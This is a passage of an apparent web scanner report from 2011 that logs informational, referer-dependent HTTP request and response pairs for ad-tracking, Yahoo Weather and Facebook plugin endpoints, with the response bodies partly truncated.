Location: https://signup.hubspot.com/setup/billing?portalId=96145&redirectToNewPortalDomain=http%3a%2f%2fcpanel.app9.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 294

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://signup.hubspot.com/setup/billing?portalId=96145&amp;redirectToNewPortalDomain=http%3a%2f%2fcpanel.app9.hubspot.com%2fDefault.aspx%3fapp%3dSiteCentral%26ui%3dhubdashboard">here</a>.</h2>
</body></html>

15.4. http://dg.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dg.specificclick.net
Path:   /

Request 1

GET /?y=3&t=h&u=http%3A%2F%2Fwww.actvalue.com%2Fpages%2Fasp%2Feditorial%2Fps_rfid.asp%3Fd%3DTecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware&r=http%3A%2F%2Fwww.actvalue.com%2F HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp?d=Tecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=3c712f7f4cdd064897ad5e033101

Response 1

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 16 Sep 2011 19:47:31 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })(); </script> <noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript> </body></html>

Request 2

GET /?y=3&t=h&u=http%3A%2F%2Fwww.actvalue.com%2Fpages%2Fasp%2Feditorial%2Fps_rfid.asp%3Fd%3DTecnologia_RFId___Radio_Frequency_Identification___Tecnologia_attiva_e_passiva___Componenti_principali__trasponder__tag___antenna__middleware&r=http%3A%2F%2Fwww.actvalue.com%2F HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=3c712f7f4cdd064897ad5e033101

Response 2

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=3c7de2a455eff6d1c9c032ca8e60; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 16 Sep 2011 19:47:49 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })(); </script> <noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript> </body></html>

15.5. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Request 1

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CB9FFEBBBCE4BAB37F0CF0124340889C; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:57 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt69ewxt"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={INFO:"info",LOG:"log",DIR:"dir"};var k=function(W,Y,U){if(typeof Y==="undefined"){Y=I.INFO;}if(w&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&Y===I.DIR){if(typeof W==="object"){for(var X in W){if(W.hasOwnProperty(X)){var S=(typeof U!=="undefined")?U+" : ":"";k(W[X],Y,S+X);}}}else{try{console.log(U+": "+W);}catch(V){}}}else{try{console[Y](W);}catch(T){}}}};var A=window!=top;var y=false;var g=new Date().getTime();var q=function(U,T){var S,X,W;var V="Detection Results:\n\n";for(S in U){W=U[S];V+=W.key+": "+decodeURIComponent(W.val)+"\n";}k(V);V="key: \n";for(X in T){if(T.hasOwnProperty(X)){V+=X+": "+T[X]+"\n";}}k(V);};k("v"+O+", mode: "+adsafeVisParams.mode);k("Server Parameters:");k(adsafeVisParams,I.DIR);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var M=function(){var S={};try{S.a=encodeURIComponent(top.location.href);}catch(V){}try{S.b=encodeURIComponent(parent.location.href);}catch(V){}if(A){try{S.c=encodeURIComponent(parent.document.referrer);}catch(V){}try{S.e=encodeURIComponent(window.document.referrer);}catch(V){}}try{S.d=encodeURIComponent(window.location.href);}catch(V){}try{S.f=encodeURIComponent(adsafeVisParams.jsref);}catch(V){}try{var U=h();S.g=encodeURIComponen
...[SNIP]...

Request 2

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8B199CB64998950DE6709680363B5C78; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:57 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "null",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt69exfh"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={INFO:"info",LOG:"log",DIR:"dir"};var k=function(W,Y,U){if(typeof Y==="undefined"){Y=I.INFO;}if(w&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&Y===I.DIR){if(typeof W==="object"){for(var X in W){if(W.hasOwnProperty(X)){var S=(typeof U!=="undefined")?U+" : ":"";k(W[X],Y,S+X);}}}else{try{console.log(U+": "+W);}catch(V){}}}else{try{console[Y](W);}catch(T){}}}};var A=window!=top;var y=false;var g=new Date().getTime();var q=function(U,T){var S,X,W;var V="Detection Results:\n\n";for(S in U){W=U[S];V+=W.key+": "+decodeURIComponent(W.val)+"\n";}k(V);V="key: \n";for(X in T){if(T.hasOwnProperty(X)){V+=X+": "+T[X]+"\n";}}k(V);};k("v"+O+", mode: "+adsafeVisParams.mode);k("Server Parameters:");k(adsafeVisParams,I.DIR);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var M=function(){var S={};try{S.a=encodeURIComponent(top.location.href);}catch(V){}try{S.b=encodeURIComponent(parent.location.href);}catch(V){}if(A){try{S.c=encodeURIComponent(parent.document.referrer);}catch(V){}try{S.e=encodeURIComponent(window.document.referrer);}catch(V){}}try{S.d=encodeURIComponent(window.location.href);}catch(V){}try{S.f=encodeURIComponent(adsafeVisParams.jsref);}catch(V){}try{var U=h();S.g=encodeURIComponent(U.g);S.q=encodeURIComponent(U.q);}catch(V){}S=D(S);S=p(S);var T=[];for(var W in S){if(S.hasOwnPropert
...[SNIP]...

15.6. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Request 1

GET /jspix?anId=144&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=879FED94B44B817BBB67FDF47F071C96; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:33 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=454&campId=179530",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt6av4n1"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={INFO:"info",LOG:"log",DIR:"dir"};var k=function(W,Y,U){if(typeof Y==="undefined"){Y=I.INFO;}if(w&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&Y===I.DIR){if(typeof W==="object"){for(var X in W){if(W.hasOwnProperty(X)){var S=(typeof U!=="undefined")?U+" : ":"";k(W[X],Y,S+X);}}}else{try{console.log(U+": "+W);}catch(V){}}}else{try{console[Y](W);}catch(T){}}}};var A=window!=top;var y=false;var g=new Date().getTime();var q=function(U,T){var S,X,W;var V="Detection Results:\n\n";for(S in U){W=U[S];V+=W.key+": "+decodeURIComponent(W.val)+"\n";}k(V);V="key: \n";for(X in T){if(T.hasOwnProperty(X)){V+=X+": "+T[X]+"\n";}}k(V);};k("v"+O+", mode: "+adsafeVisParams.mode);k("Server Parameters:");k(adsafeVisParams,I.DIR);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var M=function(){var S={};try{S.a=encodeURIComponent(top.location.href);}catch(V){}try{S.b=encodeURIComponent(parent.location.href);}catch(V){}if(A){try{S.c=encodeURIComponent(parent.document.referrer);}catch(V){}try{S.e=encodeURIComponent(window.document.referrer);}catch(V){}}try{S.d=encodeURIComponent(window.location.href);}catch(V){}try{S.f=encodeURIComponent(adsafeVisParams.jsref);}catch(V){}try{var U=h();S.g=encodeURIComponent(U.g);S.q=encodeURIComponent(U.q);}catch(V){}S=D(S);S=p(
...[SNIP]...

Request 2

GET /jspix?anId=144&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD2C19F3B96BA1AE36CE996CF770A998; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:34 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "null",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=454&campId=179530",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt6av5bq"
};


(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={INFO:"info",LOG:"log",DIR:"dir"};var k=function(W,Y,U){if(typeof Y==="undefined"){Y=I.INFO;}if(w&&(typeof console!=="undefined")&&(typeof console.info!=="undefined")&&(typeof console.log!=="undefined")){if(typeof console.dir==="undefined"&&Y===I.DIR){if(typeof W==="object"){for(var X in W){if(W.hasOwnProperty(X)){var S=(typeof U!=="undefined")?U+" : ":"";k(W[X],Y,S+X);}}}else{try{console.log(U+": "+W);}catch(V){}}}else{try{console[Y](W);}catch(T){}}}};var A=window!=top;var y=false;var g=new Date().getTime();var q=function(U,T){var S,X,W;var V="Detection Results:\n\n";for(S in U){W=U[S];V+=W.key+": "+decodeURIComponent(W.val)+"\n";}k(V);V="key: \n";for(X in T){if(T.hasOwnProperty(X)){V+=X+": "+T[X]+"\n";}}k(V);};k("v"+O+", mode: "+adsafeVisParams.mode);k("Server Parameters:");k(adsafeVisParams,I.DIR);var c={a:"top.location.href",b:"parent.location.href",c:"parent.document.referrer",d:"window.location.href",e:"window.document.referrer",f:"jsref",g:"ffCheck -- firefox result",q:"ffCheck -- parent.parent.parent... result"};var M=function(){var S={};try{S.a=encodeURIComponent(top.location.href);}catch(V){}try{S.b=encodeURIComponent(parent.location.href);}catch(V){}if(A){try{S.c=encodeURIComponent(parent.document.referrer);}catch(V){}try{S.e=encodeURIComponent(window.document.referrer);}catch(V){}}try{S.d=encodeURIComponent(window.location.href);}catch(V){}try{S.f=encodeURIComponent(adsafeVisParams.jsref);}catch(V){}try{var U=h();S.g=encodeURIComponent(U.g);S.q=encodeURIComponent(U.q);}catch(V){}S=D(S);S=p(S);var T=[];for(var W in S){if(S.hasOwnProperty(W)){T.push({key:W,val:S[W]});}}T.sort(function(Y,X){return(Y.val.length>X.val.length)?1:(Y.va
...[SNIP]...

15.7. http://weather.yahoo.com/badge/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://weather.yahoo.com
Path:   /badge/

Request 1

GET /badge/?id=2354490&u=f&t=default&l=tiny HTTP/1.1
Host: weather.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.astac.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response 1

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:54 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 5900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
   <title>Yahoo! Weather Widget | Badge - Yahoo! Weather</title>
   <link rel="stylesh
...[SNIP]...
<div class="tinyweatherimage" style="background:url('http://l.yimg.com/a/i/us/nws/weather/gr/26ds.png'); _background-image/* */: none; filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://l.yimg.com/a/i/us/nws/weather/gr/26ds.png', sizingMethod='crop');"></div>
<a target="_blank" title="Anchorage" href="http://weather.yahoo.com/united-states/alaska/anchorage-2354490/"><span>49<acronym title="Degree">&deg;</acronym><acronym title="Fahrenheit">F</acronym></span></a></div>
<div class="floatright"><a target="_blank" class="yahoologo" href="http://weather.yahoo.com" title="Yahoo weather logo"><span class="ywimg" style="background:url('http://l.yimg.com/a/lib/ywc/img/b/ywlogos.png') no-repeat; _background-image/* */: none; filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://l.yimg.com/a/lib/ywc/img/b/ywlogos.png', sizingMethod='crop');"></span></a><a target="_blank" class="twcilogo" href="http://yahoo.weather.com/?par=yahoo&site=yahoobadge&promo=0&cm_ven=Yahoo&cm_cat=yahoobadge&cm_pla=horizontal&cm_ite=homepage"> <img alt="weatherchannel logo" src="http://l.yimg.com/a/lib/ywc/img/spacer.gif"/></a></div>
</div><script src="http://us.js.yimg.com/lib/rapid/rapid_2.0.0.js"></script>
<script>
var keys = { A_pn: 'badge', A_id: 'weather'};
var conf = { keys: keys, lt_attr: 'text', client_only: 0, spaceid: 'P#2143052412', tracked_mods: ['doc'],ywa:{project_id:744846862, cf:{'11':'provider', '12':'us'}}};
var ins = new YAHOO.i13n.Track(conf);
ins.init();
</script>
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript">
var YWATracker = YWA.getTracker("1000744846862");
YWATracker.submit();
</script>
<noscript>
<div><img src="http://a.analytics.yahoo.com/p.pl?a=1000744846862&amp;js=no" width="1" height="1" alt="" /></div>
</noscript>
<script type="text/javascript">
try { document.execCommand( "BackgroundImageCache", false, true); } catch(e){};
</script>

...[SNIP]...

Request 2

GET /badge/?id=2354490&u=f&t=default&l=tiny HTTP/1.1
Host: weather.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response 2

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 5579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
   <title>Yahoo! Weather Widget | Badge - Yahoo! Weather</title>
   <link rel="stylesh
...[SNIP]...
<div class="tinyerrimage"><img title="Sorry! Weather Data request per day limit has reached for this site." src="http://l.yimg.com/a/lib/ywc/img/spacer.gif"/></div>
</div>
<div class="floatright"><a target="_blank" class="yahoologo" href="http://weather.yahoo.com" title="Yahoo weather logo"><span class="ywimg" style="background:url('http://l.yimg.com/a/lib/ywc/img/b/ywlogos.png') no-repeat; _background-image/* */: none; filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://l.yimg.com/a/lib/ywc/img/b/ywlogos.png', sizingMethod='crop');"></span></a><a target="_blank" class="twcilogo" href="http://yahoo.weather.com/?par=yahoo&site=yahoobadge&promo=0&cm_ven=Yahoo&cm_cat=yahoobadge&cm_pla=horizontal&cm_ite=homepage"> <img alt="weatherchannel logo" src="http://l.yimg.com/a/lib/ywc/img/spacer.gif"/></a></div>
</div><script src="http://us.js.yimg.com/lib/rapid/rapid_2.0.0.js"></script>
<script>
var keys = { A_pn: 'badge', A_id: 'weather'};
var conf = { keys: keys, lt_attr: 'text', client_only: 0, spaceid: 'P#2143052412', tracked_mods: ['doc'],ywa:{project_id:744846862, cf:{'11':'provider', '12':'us'}}};
var ins = new YAHOO.i13n.Track(conf);
ins.init();
</script>
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript">
var YWATracker = YWA.getTracker("1000744846862");
YWATracker.submit();
</script>
<noscript>
<div><img src="http://a.analytics.yahoo.com/p.pl?a=1000744846862&amp;js=no" width="1" height="1" alt="" /></div>
</noscript>
<script type="text/javascript">
try { document.execCommand( "BackgroundImageCache", false, true); } catch(e){};
</script>
</div>
</div>
</body>

</html><script language=javascript>
if(window.yzq_p==null)document.write("<scr"+"ipt language=javascript src=http://l.yimg.com/d/lib/bc/bc_2.0.5.js></scr"+"ipt>");
</script><script language=javascript>
if(window.yzq_p)yzq_p('P=kGjfLmKJhs4qKrnyTnOncwqHMhd7ak5zp3MADZXD&T=17sm6f40s
...[SNIP]...

15.8. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Request 1

GET /plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/national/?type=rem911
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.25.35
X-Cnection: close
Date: Sat, 17 Sep 2011 01:32:22 GMT
Content-Length: 9973

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="o7ju";</scri
...[SNIP]...
<input name="partner_id" value="bostonherald.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://bostonherald.com/news/national/?type=rem911" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u314236_2"><input value="Sign Up" type="submit" id="u314236_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u314236_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent"><div class="mhs fbEmptyWidget fbWidgetTitle"><div class="mbs">No recent activity to display.</div><div><div>Put some like buttons on your website to engage your users. Details can be found <a target="_blank" href="http://developers.facebook.com/docs/reference/plugins/">here</a>.</div></div></div></div></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1" aria-hidden="true"><i class="img sp_bnqbay sx_fa6595"></i></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="fss fwn fcg"><span><a class="uiLinkSubtle" target="_blank" href="http://developers.facebook.com/plugins/?footer=2">Facebook social plugin</a></span></div></div></div></div></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:443252,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"AQDoYYJd",no_cookies:1,lhsh:"lAQD0P3HX",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1"};
</script>
<script type="text/javasc
...[SNIP]...

Request 2

GET /plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.35.35
X-Cnection: close
Date: Sat, 17 Sep 2011 01:33:05 GMT
Content-Length: 9860

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="bCkJ";</scri
...[SNIP]...
